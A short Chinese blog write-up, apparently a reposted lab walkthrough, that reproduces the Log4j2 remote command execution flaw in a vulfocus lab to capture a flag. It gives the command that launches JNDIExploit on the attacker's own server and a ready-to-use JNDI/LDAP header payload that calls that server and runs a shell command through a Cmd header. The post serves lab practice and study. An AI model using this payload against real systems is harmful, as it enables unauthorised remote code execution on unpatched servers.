概述
1.开启靶机环境并访问
2.使用JNDIExploit.v1.2在自己的vps上开启服务
工具下载:
链接:https://pan.baidu.com/s/1oCfHPw-mMBPDDjNy-RO1YA
提取码:4x5jjava -jar JNDIExploit-1.2-SNAPSHOT.jar -i xx.xx.xx.xx(vps公网IP) -l 1234 -p 2345
3.抓包填写payload,获得flag
payload:
X-Api-Version:${jndi:ldap://xx.xx.xx.xx:1234/TomcatBypass/TomcatEcho}
Content-Type:application/x-www-from-urlencoded
Cmd:ls /tmp
完成
如果可以帮助到你,劳烦点点赞哦!
声明: 本文章仅供学习使用,不得用于未授权的渗透测试,禁止用于非法用途。
最后
以上就是慈祥白猫为你收集整理的vulfocus复现:Log4j2远程命令执行2的全部内容,希望文章能够帮你解决vulfocus复现:Log4j2远程命令执行2所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
本图文内容来源于网友提供,作为学习参考使用,或来自网络收集整理,版权属于原作者所有。
发表评论 取消回复